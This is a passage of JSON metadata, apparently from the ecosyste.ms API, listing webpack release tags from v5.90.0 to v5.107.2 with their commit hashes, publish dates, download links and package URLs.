oad.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.e